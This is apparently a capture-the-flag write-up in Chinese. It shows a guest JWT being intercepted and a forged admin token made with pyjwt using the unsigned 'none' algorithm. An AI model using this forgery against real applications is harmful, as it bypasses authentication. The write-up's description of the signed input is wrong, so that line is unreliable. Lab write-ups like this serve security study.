To validate the challenge, connect as admin.------------以admin登陸
https://jwt.io/introduction/
JSON Web令牌(JWT)是一個開放標准(RFC 7519),它定義了一種緊湊且自包含的方式,用於在各方之間作為JSON對象安全地傳輸信息。由於此信息是經過數字簽名的,因此可以被驗證和信任。可以使用秘密(使用HMAC算法)或使用RSA或ECDSA的公鑰/私鑰對對JWT進行簽名。
JWT的數據分為三部分:標頭,有效載荷,簽名(簽名)。
因為標頭和有效負載以明文形式存儲,所以簽名用於防止數據被修改。
提供數據的事務處理功能的簽名通常使用RS256(RSA非對稱加密和私鑰簽名)和HS256(HMAC SHA256對稱加密)算法。,簽名對象為base64UrlEncode(headers)+'。+ base64UrlEncode('signature')。
開始挑戰------------------
以guest身份登陸
bp截斷獲取jwt
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.OnuZnYMdetcg7AWGV6WURn8CFSfas6AQej4V9M13nsk
https://jwt.io ---------------- 查看有效載荷
使用python的pyjwt模塊,使用admin有效載荷------------重新生成令牌,沒有算法
>>> import jwt
>>> encoded = jwt.encode({'username': 'admin'}, '', algorithm='none')
>>> encoded
'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIn0.'
